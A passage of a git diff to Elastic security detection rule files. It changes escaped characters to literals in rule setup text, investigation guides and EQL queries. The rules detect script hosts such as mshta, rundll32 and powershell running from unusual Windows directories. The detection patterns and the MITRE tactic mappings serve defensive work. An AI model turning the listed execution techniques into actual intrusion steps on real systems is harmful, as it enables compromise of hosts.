a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_7.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_7.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_103.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_103.json index 74b635f2495..bc133c40199 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_103.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_104.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_104.json index c6cb87e4819..ceae7b4a545 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_104.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_105.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_105.json index c41554597ba..7982168ceb7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_105.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_106.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_106.json index a930e497a63..1e985240d2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_106.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_107.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_107.json index 3d23d2f0360..651124a0e1b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_107.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_102.json b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_102.json index 70b2336ae4d..7ccc6333a8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_102.json @@ -37,7 +37,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_103.json b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_103.json index 490da43ce68..35e4a415419 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_103.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_104.json b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_104.json index edc2ee271b4..cf339347357 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_104.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_105.json b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_105.json index b0f66ee08eb..eb85caee5a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_105.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_203.json b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_203.json index efb2eede579..e48790249ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_203.json +++ b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_203.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_204.json b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_204.json index c941eb8cb76..a13fea2ff0a 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_204.json +++ b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_204.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_205.json b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_205.json index e5216dbe66c..48cb9860088 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_205.json +++ b/packages/security_detection_engine/kibana/security_rule/cf549724-c577-4fd6-8f9b-d1b8ec519ec0_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cf575427-0839-4c69-a9e6-99fde02606f3_1.json b/packages/security_detection_engine/kibana/security_rule/cf575427-0839-4c69-a9e6-99fde02606f3_1.json index 6e179998210..24e191eeec0 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf575427-0839-4c69-a9e6-99fde02606f3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cf575427-0839-4c69-a9e6-99fde02606f3_1.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_1.json b/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_1.json index abf26e97a70..4dd2e474fb2 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cf6995ec-32a9-4b2d-9340-f8e61acf3f4e_1.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_105.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_105.json index cb61ea7f42f..6d600adad93 100644 --- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_106.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_106.json index 1b421122e4a..d1e3730dc56 100644 --- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent 